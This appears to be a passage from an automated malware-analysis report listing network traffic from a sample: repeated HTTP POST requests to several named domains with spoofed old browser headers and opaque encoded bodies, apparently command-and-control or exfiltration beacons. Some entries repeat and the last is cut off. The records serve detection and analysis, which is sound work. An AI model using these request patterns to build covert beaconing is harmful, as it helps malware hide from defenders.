              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 6b 4b 45 78 77 48 4d 2b 69 73 62 31 59 67 45 64 75 76 47 51 66 78 79 31 4c 41 58 5a 70 58 34 79 56 39 50 37 62 47 46 76 51 37 72 43 4b 6d 74 37 62 4d 31 36 6b 6c 41 75 46 54 39 4d 73 76 59 79 4d 76 51 54 6e 63 47 72 65 61 42 43 76 78 2b 61 48 65 53 68 47 65 32 51 47 6d 59 42 78 50 77 73 51 42 34 63 67 33 52 6b 6d 6e 52 6f 4c 45 34 46 78 41 4e 58 77 35 70 51 41 38 4c 75 6c 57 59 46 33 56 39 4d 2b 69 79 46 39 61 74 33 49 57 54 41 6e 36 6a 66 75 75 76 4d 76 2f 31 6c 33 41 41 79 49 54 64 74 67 6f 51 44 63 70 44 36 61 45 43 67 30 32 6f 70 37 51 33 59 67 2b 73 4b 4c 4c 4a 59 65 54 31 4a 38 58 36 4c 4f 46 67 2f 42 4e 61 49 65 33 64 53 4e 31 54 6b 55 73 6c 7a 37 48 32 6f 41 36 71 43 2f 4c 62 49 78 4e 4c 6b 53 50 4c 57 36 75 59 4d 46 68 74 6d 49 53 72 75 66 30 5a 51 39 6b 43 2f 79 74 70 55 75 34 55 6b 39 49 4f 58 52 35 70 61 68 48 46 71 54 6f 45 79 41 50 77 4b 33 58 4a 79 4b 44 38 4e 4d 47 47 44 30 6b 72 42 49 46 48 72 78 31 55 7a 79 61 31 67 41 4a 31 61 79 67 2b 57 47 79 47 51 63 34 4a 79 47 44 51 4e 69 34 72 6c 79 37 67 6b 61 6d 64 7a 53 48 47 64 41 78 6a 75 6e 44 53 43 37 34 37 78 2f 76 54 56 6d 6b 4d 4c 4a 4e 69 76 71 45 74 78 45 79 49 50 47 75 63 77 72 2b 35 55 66 38 70 56 59 6c 67 70 46 71 63 61 52 32 61 6b 4c 57 78 78 46 49 6f 53 70 69 68 2f 36 41 72 73 72 42 73 4d 4f 41 36 59 62 50 62 54 6c 78 44 72 4d 72 6b 6b 62 2b 48 30 47 45 6a 47 76 4a 33 35 52 4e 38 31 56 38 71 56 44 50 4d 77 62 45 52 4e 34 67 53 73 49 57 33 61 31 4d 63 72 48 75 5a 4c 68 75 73 41 6b 6f 6f 2f 67 66 64 6d 79 43 6d 71 6c 37 31 44 77 52 76 43 69 46 68 6a 33 67 45 72 39 37 4a 75 6c 47 31 72 56 56 32 58 70 62 36 65 54 4c 6b 37 56 52 79 45 58 67 3d 3d Data Ascii: kKExwHM+isb1YgEduvGQfxy1LAXZpX4yV9P7bGFvQ7rCKmt7bM16klAuFT9MsvYyMvQTncGreaBCvx+aHeShGe2QGmYBxPwsQB4cg3RkmnRoLE4FxANXw5pQA8LulWYF3V9M+iyF9at3IWTAn6jfuuvMv/1l3AAyITdtgoQDcpD6aECg02op7Q3Yg+sKLLJYeT1J8X6LOFg/BNaIe3dSN1TkUslz7H2oA6qC/LbIxNLkSPLW6uYMFhtmISruf0ZQ9kC/ytpUu4Uk9IOXR5pahHFqToEyAPwK3XJyKD8NMGGD0krBIFHrx1Uzya1gAJ1ayg+WGyGQc4JyGDQNi4rly7gkamdzSHGdAxjunDSC747x/vTVmkMLJNivqEtxEyIPGucwr+5Uf8pVYlgpFqcaR2akLWxxFIoSpih/6ArsrBsMOA6YbPbTlxDrMrkkb+H0GEjGvJ35RN81V8qVDPMwbERN4gSsIW3a1McrHuZLhusAkoo/gfdmyCmql71DwRvCiFhj3gEr97JulG1rVV2Xpb6eTLk7VRyEXg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 54 4e 55 6e 4a 36 48 6d 6c 63 62 62 51 4c 45 61 41 4d 2b 6f 6b 58 70 48 58 79 6d 66 46 50 63 55 5a 5a 38 56 46 48 67 4b 38 61 56 4d 62 71 2f 75 42 67 6e 64 45 2b 6d 52 6b 6f 59 31 7a 42 7a 42 31 56 67 39 6b 42 2f 2b 49 30 6d 54 4a 62 4c 71 47 6b 72 52 59 53 52 37 67 7a 50 75 6a 56 43 51 69 45 4f 39 52 53 66 45 70 4f 63 63 64 6b 4b 64 6c 55 56 71 48 31 31 75 6e 39 4f 51 41 38 68 4e 61 72 62 78 70 4d 4f 44 72 75 66 4c 51 2f 6e 50 56 71 55 37 76 68 77 62 37 35 5a 37 48 6d 65 33 4a 47 59 76 67 33 4a 56 37 6f 59 43 42 5a 6e 49 59 7a 56 71 6c 53 37 37 6d 31 47 69 37 77 62 6e 4c 67 4b 4d 7a 7a 52 58 49 74 69 37 73 48 37 55 41 69 76 6b 58 71 41 6e 52 50 75 77 65 70 4b 30 59 48 61 47 43 46 32 58 79 56 33 34 4e 78 63 73 6d 6d 44 4b 4f 47 76 6c 65 50 73 74 51 79 6b 7a 39 71 6c 58 44 46 55 56 4b 48 39 73 70 72 34 43 38 54 6f 58 58 64 6d 39 56 6a 34 44 4b 67 6d 2f 6c 4f 64 35 74 52 43 51 71 64 55 31 48 39 6f 47 6e 4b 64 49 42 4a 30 45 39 4e 41 6b 54 47 59 37 69 35 55 51 33 43 36 42 74 69 6f 57 52 70 4e 46 62 72 5a 68 54 55 68 37 6a 51 52 46 59 70 2b 70 68 7a 53 5a 4b 50 68 66 69 4e 6a 66 49 65 6c 71 59 2b 33 44 4b 53 49 59 30 73 42 52 4b 35 42 69 77 58 38 77 6d 31 50 78 63 49 68 32 73 6d 34 38 49 71 74 36 43 55 4f 32 52 4e 72 2b 39 64 63 34 4b 68 4b 46 35 38 76 4f 54 66 66 6d 4f 6d 5a 4a 62 61 67 4e 72 42 50 32 71 51 76 71 6c 48 62 48 46 33 5a 35 6a 30 79 68 49 70 71 59 49 75 7a 74 55 37 48 47 7a 4a 36 57 6f 54 55 7a 2f 72 48 56 4e 5a 33 6b 6c 38 4e 6b 59 5a 70 67 38 61 31 50 44 41 63 59 32 38 45 51 53 4a 37 52 44 39 74 77 7a 31 4b 65 45 71 79 4a 31 38 74 78 74 61 4a 6e 57 4b 4a 6b 39 48 5a 48 76 4b 4a 77 32 6c 69 76 77 63 35 51 4d 54 2b 45 71 57 66 5a 69 6d 75 65 6e 59 4c 46 79 39 42 61 47 6d 6a 6e 4c 42 4e 66 4e 77 56 68 54 77 59 62 36 45 77 6b 37 36 57 69 Data Ascii: TNUnJ6HmlcbbQLEaAM+okXpHXymfFPcUZZ8VFHgK8aVMbq/uBgndE+mRkoY1zBzB1Vg9kB/+I0mTJbLqGkrRYSR7gzPujVCQiEO9RSfEpOccdkKdlUVqH11un9OQA8hNarbxpMODrufLQ/nPVqU7vhwb75Z7Hme3JGYvg3JV7oYCBZnIYzVqlS77m1Gi7wbnLgKMzzRXIti7sH7UAivkXqAnRPuwepK0YHaGCF2XyV34NxcsmmDKOGvlePstQykz9qlXDFUVKH9spr4C8ToXXdm9Vj4DKgm/lOd5tRCQqdU1H9oGnKdIBJ0E9NAkTGY7i5UQ3C6BtioWRpNFbrZhTUh7jQRFYp+phzSZKPhfiNjfIelqY+3DKSIY0sBRK5BiwX8wm1PxcIh2sm48Iqt6CUO2RNr+9dc4KhKF58vOTffmOmZJbagNrBP2qQvqlHbHF3Z5j0yhIpqYIuztU7HGzJ6WoTUz/rHVNZ3kl8NkYZpg8a1PDAcY28EQSJ7RD9twz1KeEqyJ18txtaJnWKJk9HZHvKJw2livwc5QMT+EqWfZimuenYLFy9BaGmjnLBNfNwVhTwYb6Ewk76Wi
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 46 6c 53 2b 54 6b 57 50 68 73 59 51 42 43 5a 55 62 4c 63 57 37 4c 36 4c 75 54 73 54 5a 47 53 6c 53 52 67 55 72 61 79 77 77 6f 49 48 73 6b 61 41 6b 74 36 4b 4c 45 62 6c 77 6e 4f 74 37 32 6b 69 67 31 6b 53 42 61 2b 68 55 79 30 64 74 6a 6c 42 6c 69 71 31 58 48 46 39 51 2f 63 49 39 49 53 33 73 36 53 64 78 2b 74 77 35 32 63 47 71 62 48 78 61 4a 53 42 52 7a 2b 77 6b 59 37 43 69 35 38 78 53 30 47 6f 34 2b 38 4c 42 46 61 63 49 30 38 2f 43 35 41 6b 70 73 74 50 56 70 2b 4b 72 76 53 6f 57 61 2b 70 6e 5a 55 73 57 66 61 46 68 55 4e 75 5a 68 73 4e 39 6b 6a 43 6a 72 72 4b 65 6d 62 6a 66 6f 4d 36 47 4d 7a 78 37 4a 6b 76 71 41 6b 6f 55 75 52 6c 59 59 62 56 46 34 6e 4c 67 34 42 48 54 6f 72 6d 36 30 76 64 37 4e 42 77 46 79 6b 38 35 7a 59 41 4b 37 2f 42 59 4a 6a 4e 36 36 75 78 77 34 39 63 4d 4c 30 57 33 46 6d 76 53 79 6b 58 31 67 6c 78 4b 6b 30 56 53 65 5a 70 6c 30 55 79 50 78 59 4e 4a 41 55 54 49 6b 61 74 2b 78 4e 58 71 78 76 54 39 7a 30 56 53 57 78 69 64 75 42 65 31 49 4a 65 30 61 6f 4f 4b 38 78 78 4b 41 71 2b 2f 71 33 4e 62 50 50 52 79 35 4e 4f 2f 6e 47 52 45 62 57 59 64 79 76 6e 77 76 2f 53 6a 66 47 77 52 5a 36 41 33 54 4d 78 42 6d 44 46 56 6c 48 5a 31 36 6e 53 35 33 6e 35 42 41 75 73 41 6d 4c 6b 64 74 64 70 55 53 78 77 78 61 46 51 69 45 39 48 44 64 38 66 62 6e 4f 6a 7a 65 30 75 6e 31 4e 6f 79 46 49 4d 71 33 77 57 4c 58 76 77 76 67 55 4b 53 48 2b 2f 68 49 4a 66 4d 34 2f 31 36 48 6b 59 6d 4d 64 74 6a 53 6d 79 50 2f 2f 37 31 67 54 65 4d 35 38 6d 49 52 32 44 72 56 69 6e 6a 6e 66 6a 47 44 33 51 76 4b 38 6d 41 7a 74 69 34 44 52 64 65 61 62 4b 42 4f 4f 58 30 6f 35 2f 6e 37 49 61 59 61 46 50 47 38 38 67 32 67 39 69 58 71 6b 47 66 50 4d 38 51 4e 62 5a 68 59 6a 7a 68 4c 58 42 72 46 72 2b 63 51 6f 57 7a 55 31 68 33 56 66 5a 37 6a 4b 43 55 72 57 75 72 41 3d 3d Data Ascii: FlS+TkWPhsYQBCZUbLcW7L6LuTsTZGSlSRgUraywwoIHskaAkt6KLEblwnOt72kig1kSBa+hUy0dtjlBliq1XHF9Q/cI9IS3s6Sdx+tw52cGqbHxaJSBRz+wkY7Ci58xS0Go4+8LBFacI08/C5AkpstPVp+KrvSoWa+pnZUsWfaFhUNuZhsN9kjCjrrKembjfoM6GMzx7JkvqAkoUuRlYYbVF4nLg4BHTorm60vd7NBwFyk85zYAK7/BYJjN66uxw49cML0W3FmvSykX1glxKk0VSeZpl0UyPxYNJAUTIkat+xNXqxvT9z0VSWxiduBe1IJe0aoOK8xxKAq+/q3NbPPRy5NO/nGREbWYdyvnwv/SjfGwRZ6A3TMxBmDFVlHZ16nS53n5BAusAmLkdtdpUSxwxaFQiE9HDd8fbnOjze0un1NoyFIMq3wWLXvwvgUKSH+/hIJfM4/16HkYmMdtjSmyP//71gTeM58mIR2DrVinjnfjGD3QvK8mAzti4DRdeabKBOOX0o5/n7IaYaFPG88g2g9iXqkGfPM8QNbZhYjzhLXBrFr+cQoWzU1h3VfZ7jKCUrWurA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2b 57 37 45 6e 73 78 34 6b 63 61 64 50 4f 44 34 4e 31 33 66 45 39 38 31 59 6d 57 6b 56 56 7a 35 77 48 62 4b 71 34 61 69 39 69 6c 71 70 30 35 65 62 47 76 45 47 7a 68 62 7a 6d 39 70 6f 39 44 4e 64 6e 47 55 5a 6b 4a 41 2b 71 71 63 2b 4f 67 62 76 70 6f 65 6c 2b 30 31 34 6c 52 6c 6b 2b 2f 33 33 37 78 49 42 6a 55 48 39 46 76 52 71 63 66 2b 41 42 64 67 67 74 6d 2f 4c 5a 6d 6d 6a 4b 2b 76 4a 7a 50 4a 79 30 50 4c 59 6e 70 4a 67 71 6e 6a 6b 76 6a 67 5a 6d 75 45 46 67 54 72 6c 33 57 74 47 36 6b 31 67 41 4c 41 31 2f 66 71 42 36 65 36 45 63 6d 4b 34 63 52 48 4f 47 46 4c 4a 33 57 4c 33 37 58 4a 74 35 43 42 6c 2b 4e 65 42 37 66 63 32 6b 6e 30 4c 30 63 4a 33 35 47 76 53 55 74 4f 55 59 6e 35 39 55 46 4f 47 58 55 4f 76 4e 41 34 39 72 31 36 75 78 57 43 72 56 53 52 52 6d 51 54 67 4b 43 68 54 72 54 52 7a 6a 70 4c 4c 2b 78 68 58 64 71 2f 62 52 6c 51 55 47 78 41 67 71 78 52 64 67 69 69 42 38 57 6c 62 7a 4e 37 50 72 75 76 36 78 2b 77 41 6d 45 64 6b 62 46 37 2f 68 62 48 2f 6c 70 37 74 77 71 76 72 30 52 7a 6b 4a 64 73 56 77 61 57 61 6e 57 55 49 58 4e 63 7a 79 78 78 64 58 4e 6f 30 4b 4b 4f 51 64 5a 63 6c 35 43 48 71 69 4f 32 48 50 51 48 68 71 75 48 46 2f 69 78 61 69 69 52 34 54 59 56 65 6b 55 4d 6f 52 6f 71 52 52 55 35 36 30 7a 72 57 6a 52 7a 48 58 51 71 38 6e 38 58 74 37 6e 6f 72 79 34 6d 69 49 47 57 39 47 46 58 77 77 44 77 33 44 72 59 6e 63 78 62 41 59 47 61 6a 71 74 2b 46 34 4e 46 6e 38 61 31 4f 59 59 46 2b 39 77 6f 6d 67 53 54 44 6b 58 31 34 49 52 7a 6c 49 42 4a 4e 6c 64 36 4a 2f 73 58 4d 64 65 73 4c 4f 63 31 54 71 2f 33 2f 4f 38 4b 6f 53 43 32 2b 76 51 6a 67 47 46 70 35 46 53 66 47 65 4a 35 66 7a 53 59 2f 42 69 78 2b 62 6b 55 43 4c 68 5a 70 76 4c 65 56 47 5a 54 31 70 33 63 6f 73 6a 74 70 43 6f 38 30 47 70 31 69 44 56 2b 56 70 76 56 4e 31 68 44 63 6f 72 41 Data Ascii: +W7Ensx4kcadPOD4N13fE981YmWkVVz5wHbKq4ai9ilqp05ebGvEGzhbzm9po9DNdnGUZkJA+qqc+Ogbvpoel+014lRlk+/337xIBjUH9FvRqcf+ABdggtm/LZmmjK+vJzPJy0PLYnpJgqnjkvjgZmuEFgTrl3WtG6k1gALA1/fqB6e6EcmK4cRHOGFLJ3WL37XJt5CBl+NeB7fc2kn0L0cJ35GvSUtOUYn59UFOGXUOvNA49r16uxWCrVSRRmQTgKChTrTRzjpLL+xhXdq/bRlQUGxAgqxRdgiiB8WlbzN7Pruv6x+wAmEdkbF7/hbH/lp7twqvr0RzkJdsVwaWanWUIXNczyxxdXNo0KKOQdZcl5CHqiO2HPQHhquHF/ixaiiR4TYVekUMoRoqRRU560zrWjRzHXQq8n8Xt7nory4miIGW9GFXwwDw3DrYncxbAYGajqt+F4NFn8a1OYYF+9womgSTDkX14IRzlIBJNld6J/sXMdesLOc1Tq/3/O8KoSC2+vQjgGFp5FSfGeJ5fzSY/Bix+bkUCLhZpvLeVGZT1p3cosjtpCo80Gp1iDV+VpvVN1hDcorA
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 32 5a 52 2f 48 75 66 75 6e 63 5a 42 50 71 52 4b 6c 68 38 7a 6c 4c 44 68 39 53 70 64 59 65 32 66 43 37 45 76 74 2f 74 55 70 37 57 50 72 69 30 61 4d 51 4f 56 67 57 4b 47 32 39 79 2f 6d 49 53 35 2b 44 61 75 62 64 54 6a 51 6c 4c 4f 52 32 30 75 7a 48 52 45 6a 6e 58 49 66 57 52 63 4c 74 5a 77 4f 4e 71 77 55 67 54 70 4f 39 6d 64 57 38 46 65 72 5a 63 46 41 6d 46 65 66 59 73 6c 45 46 70 7a 7a 59 61 6d 74 75 31 76 66 2f 2b 36 4f 39 64 51 4c 6f 36 39 6e 43 4b 6f 77 74 48 37 72 6f 70 78 5a 45 6b 4f 4b 6a 45 65 56 67 37 5a 4f 77 78 6e 78 41 47 2f 33 70 6d 43 6d 4d 78 6b 57 77 7a 34 61 39 34 37 65 6f 79 44 6b 75 65 67 32 49 64 62 42 39 66 44 77 52 76 43 47 70 4c 44 57 66 56 65 57 51 42 68 47 2f 4e 66 4b 53 36 59 76 31 6d 34 69 41 36 47 62 33 5a 65 73 4b 33 46 37 30 5a 49 64 33 48 48 34 68 48 4c 76 6c 58 43 76 59 6a 43 74 48 30 68 68 74 50 6c 33 38 7a 76 36 45 2f 78 2b 79 58 36 79 75 6a 48 71 58 4c 36 41 43 78 4f 59 4d 77 73 35 48 6e 69 61 45 4a 62 49 36 77 70 57 47 56 62 2f 47 47 56 72 51 77 55 38 6b 2b 46 6a 52 54 34 42 79 47 77 63 61 32 6d 6d 42 65 57 78 42 43 31 77 64 54 31 61 33 53 79 77 54 31 36 66 52 54 42 52 42 54 6d 55 4a 75 5a 45 67 6b 77 4d 4e 71 44 6d 39 4c 36 67 58 48 2b 4c 48 72 33 78 76 69 5a 33 37 56 64 42 57 58 78 5a 57 2f 54 49 61 57 47 38 59 6b 38 41 4f 4c 53 45 41 6c 6c 56 44 30 63 72 31 48 33 76 6c 71 4a 69 51 4f 45 6f 55 75 57 53 58 44 75 74 52 4a 55 74 74 41 4b 76 30 55 4a 4e 43 72 31 37 78 54 47 59 4f 4b 65 6b 45 6f 6c 45 45 49 4f 4f 59 68 6f 42 7a 72 55 56 77 70 2f 46 47 4c 51 38 4a 69 36 53 6b 34 4c 51 6e 4c 69 78 33 31 68 75 4e 4e 67 48 45 67 39 4a 48 48 71 54 37 42 4f 37 67 35 41 72 65 49 2f 52 77 64 37 6c 58 34 42 6a 76 4e 6d 70 36 61 64 74 2f 6b 4f 61 56 75 35 4e 39 56 70 45 76 6a 59 64 77 3d 3d Data Ascii: 2ZR/HufuncZBPqRKlh8zlLDh9SpdYe2fC7Evt/tUp7WPri0aMQOVgWKG29y/mIS5+DaubdTjQlLOR20uzHREjnXIfWRcLtZwONqwUgTpO9mdW8FerZcFAmFefYslEFpzzYamtu1vf/+6O9dQLo69nCKowtH7ropxZEkOKjEeVg7ZOwxnxAG/3pmCmMxkWwz4a947eoyDkueg2IdbB9fDwRvCGpLDWfVeWQBhG/NfKS6Yv1m4iA6Gb3ZesK3F70ZId3HH4hHLvlXCvYjCtH0hhtPl38zv6E/x+yX6yujHqXL6ACxOYMws5HniaEJbI6wpWGVb/GGVrQwU8k+FjRT4ByGwca2mmBeWxBC1wdT1a3SywT16fRTBRBTmUJuZEgkwMNqDm9L6gXH+LHr3xviZ37VdBWXxZW/TIaWG8Yk8AOLSEAllVD0cr1H3vlqJiQOEoUuWSXDutRJUttAKv0UJNCr17xTGYOKekEolEEIOOYhoBzrUVwp/FGLQ8Ji6Sk4LQnLix31huNNgHEg9JHHqT7BO7g5AreI/Rwd7lX4BjvNmp6adt/kOaVu5N9VpEvjYdw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2b 57 37 45 6e 73 78 34 6b 63 61 64 50 4f 44 34 4e 31 33 66 45 39 38 31 59 6d 57 6b 56 56 7a 35 77 48 62 4b 71 34 61 69 39 69 6c 71 70 30 35 65 62 47 76 45 47 7a 68 62 7a 6d 39 70 6f 39 44 4e 64 6e 47 55 5a 6b 4a 41 2b 71 71 63 2b 4f 67 62 76 70 6f 65 6c 2b 30 31 34 6c 52 6c 6b 2b 2f 33 33 37 78 49 42 6a 55 48 39 46 76 52 71 63 66 2b 41 42 64 67 67 74 6d 2f 4c 5a 6d 6d 6a 4b 2b 76 4a 7a 50 4a 79 30 50 4c 59 6e 70 4a 67 71 6e 6a 6b 76 6a 67 5a 6d 75 45 46 67 54 72 6c 33 57 74 47 36 6b 31 67 41 4c 41 31 2f 66 71 42 36 65 36 45 63 6d 4b 34 63 52 48 4f 47 46 4c 4a 33 57 4c 33 37 58 4a 74 35 43 42 6c 2b 4e 65 42 37 66 63 32 6b 6e 30 4c 30 63 4a 33 35 47 76 53 55 74 4f 55 59 6e 35 39 55 46 4f 47 58 55 4f 76 4e 41 34 39 72 31 36 75 78 57 43 72 56 53 52 52 6d 51 54 67 4b 43 68 54 72 54 52 7a 6a 70 4c 4c 2b 78 68 58 64 71 2f 62 52 6c 51 55 47 78 41 67 71 78 52 64 67 69 69 42 38 57 6c 62 7a 4e 37 50 72 75 76 36 78 2b 77 41 6d 45 64 6b 62 46 37 2f 68 62 48 2f 6c 70 37 74 77 71 76 72 30 52 7a 6b 4a 64 73 56 77 61 57 61 6e 57 55 49 58 4e 63 7a 79 78 78 64 58 4e 6f 30 4b 4b 4f 51 64 5a 63 6c 35 43 48 71 69 4f 32 48 50 51 48 68 71 75 48 46 2f 69 78 61 69 69 52 34 54 59 56 65 6b 55 4d 6f 52 6f 71 52 52 55 35 36 30 7a 72 57 6a 52 7a 48 58 51 71 38 6e 38 58 74 37 6e 6f 72 79 34 6d 69 49 47 57 39 47 46 58 77 77 44 77 33 44 72 59 6e 63 78 62 41 59 47 61 6a 71 74 2b 46 34 4e 46 6e 38 61 31 4f 59 59 46 2b 39 77 6f 6d 67 53 54 44 6b 58 31 34 49 52 7a 6c 49 42 4a 4e 6c 64 36 4a 2f 73 58 4d 64 65 73 4c 4f 63 31 54 71 2f 33 2f 4f 38 4b 6f 53 43 32 2b 76 51 6a 67 47 46 70 35 46 53 66 47 65 4a 35 66 7a 53 59 2f 42 69 78 2b 62 6b 55 43 4c 68 5a 70 76 4c 65 56 47 5a 54 31 70 33 63 6f 73 6a 74 70 43 6f 38 30 47 70 31 69 44 56 2b 56 70 76 56 4e 31 68 44 63 6f 72 41 Data Ascii: +W7Ensx4kcadPOD4N13fE981YmWkVVz5wHbKq4ai9ilqp05ebGvEGzhbzm9po9DNdnGUZkJA+qqc+Ogbvpoel+014lRlk+/337xIBjUH9FvRqcf+ABdggtm/LZmmjK+vJzPJy0PLYnpJgqnjkvjgZmuEFgTrl3WtG6k1gALA1/fqB6e6EcmK4cRHOGFLJ3WL37XJt5CBl+NeB7fc2kn0L0cJ35GvSUtOUYn59UFOGXUOvNA49r16uxWCrVSRRmQTgKChTrTRzjpLL+xhXdq/bRlQUGxAgqxRdgiiB8WlbzN7Pruv6x+wAmEdkbF7/hbH/lp7twqvr0RzkJdsVwaWanWUIXNczyxxdXNo0KKOQdZcl5CHqiO2HPQHhquHF/ixaiiR4TYVekUMoRoqRRU560zrWjRzHXQq8n8Xt7nory4miIGW9GFXwwDw3DrYncxbAYGajqt+F4NFn8a1OYYF+9womgSTDkX14IRzlIBJNld6J/sXMdesLOc1Tq/3/O8KoSC2+vQjgGFp5FSfGeJ5fzSY/Bix+bkUCLhZpvLeVGZT1p3cosjtpCo80Gp1iDV+VpvVN1hDcorA
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 32 5a 52 2f 48 75 66 75 6e 63 5a 42 50 71 52 4b 6c 68 38 7a 6c 4c 44 68 39 53 70 64 59 65 32 66 43 37 45 76 74 2f 74 55 70 37 57 50 72 69 30 61 4d 51 4f 56 67 57 4b 47 32 39 79 2f 6d 49 53 35 2b 44 61 75 62 64 54 6a 51 6c 4c 4f 52 32 30 75 7a 48 52 45 6a 6e 58 49 66 57 52 63 4c 74 5a 77 4f 4e 71 77 55 67 54 70 4f 39 6d 64 57 38 46 65 72 5a 63 46 41 6d 46 65 66 59 73 6c 45 46 70 7a 7a 59 61 6d 74 75 31 76 66 2f 2b 36 4f 39 64 51 4c 6f 36 39 6e 43 4b 6f 77 74 48 37 72 6f 70 78 5a 45 6b 4f 4b 6a 45 65 56 67 37 5a 4f 77 78 6e 78 41 47 2f 33 70 6d 43 6d 4d 78 6b 57 77 7a 34 61 39 34 37 65 6f 79 44 6b 75 65 67 32 49 64 62 42 39 66 44 77 52 76 43 47 70 4c 44 57 66 56 65 57 51 42 68 47 2f 4e 66 4b 53 36 59 76 31 6d 34 69 41 36 47 62 33 5a 65 73 4b 33 46 37 30 5a 49 64 33 48 48 34 68 48 4c 76 6c 58 43 76 59 6a 43 74 48 30 68 68 74 50 6c 33 38 7a 76 36 45 2f 78 2b 79 58 36 79 75 6a 48 71 58 4c 36 41 43 78 4f 59 4d 77 73 35 48 6e 69 61 45 4a 62 49 36 77 70 57 47 56 62 2f 47 47 56 72 51 77 55 38 6b 2b 46 6a 52 54 34 42 79 47 77 63 61 32 6d 6d 42 65 57 78 42 43 31 77 64 54 31 61 33 53 79 77 54 31 36 66 52 54 42 52 42 54 6d 55 4a 75 5a 45 67 6b 77 4d 4e 71 44 6d 39 4c 36 67 58 48 2b 4c 48 72 33 78 76 69 5a 33 37 56 64 42 57 58 78 5a 57 2f 54 49 61 57 47 38 59 6b 38 41 4f 4c 53 45 41 6c 6c 56 44 30 63 72 31 48 33 76 6c 71 4a 69 51 4f 45 6f 55 75 57 53 58 44 75 74 52 4a 55 74 74 41 4b 76 30 55 4a 4e 43 72 31 37 78 54 47 59 4f 4b 65 6b 45 6f 6c 45 45 49 4f 4f 59 68 6f 42 7a 72 55 56 77 70 2f 46 47 4c 51 38 4a 69 36 53 6b 34 4c 51 6e 4c 69 78 33 31 68 75 4e 4e 67 48 45 67 39 4a 48 48 71 54 37 42 4f 37 67 35 41 72 65 49 2f 52 77 64 37 6c 58 34 42 6a 76 4e 6d 70 36 61 64 74 2f 6b 4f 61 56 75 35 4e 39 56 70 45 76 6a 59 64 77 3d 3d Data Ascii: 2ZR/HufuncZBPqRKlh8zlLDh9SpdYe2fC7Evt/tUp7WPri0aMQOVgWKG29y/mIS5+DaubdTjQlLOR20uzHREjnXIfWRcLtZwONqwUgTpO9mdW8FerZcFAmFefYslEFpzzYamtu1vf/+6O9dQLo69nCKowtH7ropxZEkOKjEeVg7ZOwxnxAG/3pmCmMxkWwz4a947eoyDkueg2IdbB9fDwRvCGpLDWfVeWQBhG/NfKS6Yv1m4iA6Gb3ZesK3F70ZId3HH4hHLvlXCvYjCtH0hhtPl38zv6E/x+yX6yujHqXL6ACxOYMws5HniaEJbI6wpWGVb/GGVrQwU8k+FjRT4ByGwca2mmBeWxBC1wdT1a3SywT16fRTBRBTmUJuZEgkwMNqDm9L6gXH+LHr3xviZ37VdBWXxZW/TIaWG8Yk8AOLSEAllVD0cr1H3vlqJiQOEoUuWSXDutRJUttAKv0UJNCr17xTGYOKekEolEEIOOYhoBzrUVwp/FGLQ8Ji6Sk4LQnLix31huNNgHEg9JHHqT7BO7g5AreI/Rwd7lX4BjvNmp6adt/kOaVu5N9VpEvjYdw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 47 50 39 6a 30 38 4c 4f 6f 38 61 6c 57 6b 73 39 74 62 38 54 79 45 56 64 4d 66 44 53 69 59 6c 6f 46 74 6b 45 69 65 6e 31 6c 78 70 78 4b 32 73 77 35 4e 6c 6c 35 77 6e 4b 52 4e 35 65 70 6b 32 78 34 61 62 38 6c 6b 68 58 34 38 56 50 42 30 43 30 51 35 6f 48 79 76 69 58 70 30 52 38 34 71 68 39 31 46 65 4d 69 70 4e 6a 64 50 4b 47 50 6d 72 33 30 44 70 67 39 7a 76 32 57 55 77 63 70 76 44 38 5a 46 39 59 68 51 6e 33 30 39 70 66 37 34 48 4f 34 70 42 6c 79 71 4e 63 72 75 68 2b 66 6a 68 71 42 72 78 32 74 7a 50 79 70 73 72 72 56 4c 4f 46 4b 6c 33 67 73 41 63 37 79 78 6f 55 4f 34 45 77 63 52 70 7a 59 56 2b 4a 55 39 5a 42 32 53 39 53 50 65 61 66 51 35 65 52 63 69 41 5a 51 43 79 48 34 6f 59 78 4b 79 6f 33 4c 42 63 67 71 39 4f 6c 78 68 68 49 70 6f 77 4e 74 4f 76 50 5a 6e 38 55 61 64 43 72 54 6b 53 48 5a 57 2f 50 79 7a 72 5a 47 6c 77 6c 38 34 72 69 6b 66 70 6f 50 49 73 52 76 57 74 49 76 67 42 76 53 66 38 5a 5a 4e 4c 36 73 54 42 62 4c 72 51 49 39 6b 4e 44 46 6a 4d 71 72 65 62 4c 45 56 6c 55 2b 4f 30 73 64 34 73 4c 57 44 50 54 37 57 38 7a 78 50 54 4e 2f 76 34 31 75 36 4f 37 6c 6e 